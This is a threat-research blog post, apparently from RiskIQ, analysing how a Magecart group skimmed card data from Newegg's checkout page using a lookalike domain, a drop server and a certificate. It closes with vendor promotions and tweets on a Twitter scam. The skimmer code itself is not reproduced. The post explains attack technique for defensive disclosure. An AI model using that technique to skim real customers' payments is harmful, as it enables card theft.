Your organization’s leadership is 12 times more likely to be the target of a security incident and nine times more likely to be the target of a data breach than they were last year. Find out how they can be protected.
Read the Datasheet
Gift Cardsharks: The Massive Threat Campaigns Circling Beneath the Surface
Learn about the attack group primarily targeting gift card retailers and the monetization techniques they use.
Get the Report
Threat Hunting Workshop Series
Join one of our security threat hunting workshops to get hands-on experience investigating and remediating threats.
Attend an Upcoming Workshop
Inside Magecart: New RiskIQ & Flashpoint Research Report
Learn about the groups and criminal underworld behind the front-page breaches.
Threat Hunting Guide: 3 Must-Haves for the Effective Modern Threat Hunter
The threat hunting landscape is constantly evolving. Learn the techniques, tactics, and tools needed to become a highly-effective threat hunter.
RiskIQ conducted the research for this report in collaboration with Volexity, which will release a separate report of its own. From different perspectives, we will discuss the same incident, showing how we found and analyzed the latest instance of Magecart using our unique capabilities and datasets.
While the dust is settling on the British Airways compromise, the Magecart actor behind it has not stopped their work, hitting yet another large merchant: Newegg.
Last week we published details on the British Airways compromise immediately after the company made its first advisory public linking the breach of customer credit card information to Magecart. We were able to disclose these details based on our years of tracking the activities and infrastructure of the umbrella of Magecart groups performing digital credit card skimming campaigns. The British Airways cyber attack was highly targeted and done via a tactic we’d seen evolving through the years.
The report on the British Airways cyber attack came shortly after our discovery that Magecart was also behind the breach of Ticketmaster. As we built the narrative, it’s becoming clear to the industry that these simple yet clever cyber attacks are not only devastating, they’re becoming more and more prevalent. Newegg is just the latest victim.
The breach of Newegg shows the true extent of Magecart operators’ reach. These cyber attacks are not confined to certain geolocations or specific industries—any organization that processes payments online is a target. The elements of the British Airways cyber attacks were all present in the cyber attack on Newegg: they integrated with the victim’s payment system and blended with the infrastructure, staying there as long as possible.
On August 13th Magecart operators registered a domain called neweggstats.com with the intent of blending in with Newegg’s primary domain, newegg.com. Registered through Namecheap, the malicious domain initially pointed to a standard parking host. However, the actors changed it to 188.8.131.52 a day later, a Magecart drop server where their skimmer backend runs to receive skimmed credit card information. Similar to the British Airways cyber attack, these actors acquired a certificate issued for the domain by Comodo to lend an air of legitimacy to their page:
Fig-1 Cert used in the cyber attack
At this point, the server was ready for an cyber attack—an attack against the customers of newegg.com. Around August 14th, the cyber attackers placed the skimmer code on Newegg, managing to integrate it into the checkout process and achieve their goal of disguising it well.
When a customer wants to buy a product they have to go through the following steps:
The skimmer was put on the payment processing page itself, not in a script, so it would not show unless the payment page was hit. Hitting that page means a customer went through the first two steps—they would not be able to hit the checkout page without putting anything in a cart and entered a validated address.
The URL for the page that would return the skimmer was:
https://secure.newegg.com/GlobalShopping/CheckoutStep2.aspxIntegrating with this process hid the skimmer and might help explain how it was on the Newegg website for more than a month.
The skimmer code is recognizable from the British Airways incident, with the same basecode. All the cyber attackers changed is the name of the form it needs to serialize to obtain payment information and the server to send it to, this time themed with Newegg instead of British Airways. In the case of Newegg, the skimmer was smaller because it only had to serialize one form and therefore condensed down to a tidy 15 lines of script:
Fig-2 15 lines of script, smaller than the British Airways cyber attack
The first time the skimmer became active was around August 14th, and we confirmed the skimmer was removed on September 18th, which means the cyber attackers had a full month of skimming Newegg customers. Conveniently for the cyber attackers, the skimmer, just like in the British Airways cyber attack, works for both desktop and mobile customers.
With the size of the business evaluated at $2.65 billion in 2016, Newegg is an extremely popular retailer. Alexa shows that Newegg has the 161st most popular site in the U.S. and Similarweb, which also gathers information on site visits, estimates Newegg receives over 50 million visitors a month. Over an entire month of skimming, we can assume this cyber attack claimed a massive number of victims.
Magecart cyber attacks are surging—RiskIQ’s automatic detections of instances of Magecart breaches pings us almost hourly. Meanwhile, we’re seeing cyber attackers evolve and improve over time, setting their sights on breaches of large brands. While some Magecart groups still target smaller shops, the subgroup responsible for the cyber attacks against Newegg and British Airways is particularly audacious, performing cunning, highly targeted cyber attacks with skimmers that seamlessly integrate into their targets’ websites.
The cyber attack on Newegg shows that while third parties have been a problem for websites—as in the case of the Ticketmaster breach—self-hosted scripts help cyber attackers move and evolve, in this case changing the actual payment processing pages to place their skimmer.
We urge banks to issue new cards or added protection through OTP on cards they can correlate belonging to transactions that occurred on Newegg between August 14th and September 18th.
RiskIQ is the leader in attack surface management. We help organizations discover, understand, and mitigate exposures across all digital channels.
“(...) RiskIQ has been able to track much more of the bad guy’s infrastructure used in their scam operations. We’ve identified around 400 domains so far that are all tied to these scams.” - @ydklijnsma
WHAT JUST HAPPENED? Security pros offered a range of opinions about the breach. All agreed the fault did not lie with each hacked account's owner. Some say it may have come from inside @Twitter.
@BradyDale and @benjaminopowers report
Targeted #cyberthreats are spiking during #COVID19. We provide one source for information to simplify and accelerate your investigation process #ThreatHunting https://bit.ly/3c9xKoq
RiskIQ researchers just doubled the number of IoCs in the Pastebin. Please continue to monitor it for updates as this situation evolves https://pastebin.com/h64CK3CG #twitterhack #twitterhacks #ThreatIntel #IOCs
Just in case my last tweet got lost in the thread storm, @RiskIQ's list of domains apparently tied to this scam gives us a pretty good idea of who was targeted here. https://pastebin.com/h64CK3CG
This is developing very quickly, but seems to have been staged well in advance. Take a look at some these domains set up to support this scam. H/T @RiskIQ https://twitter.com/ydklijnsma/status/1283508384335925248
Leveraging @RiskIQ's datasets we have identified more infrastructure tied to the current cryptocurrency scammers impacting @elonmusk , @billgates, etc. This is research data, validate before taking action, it might identify new targets also.
At this point we can just assume the entire platform compromised. https://twitter.com/ydklijnsma/status/1283503695796162560
And they've just crossed the cryptocurrency boundary https://twitter.com/ydklijnsma/status/1283501318917611521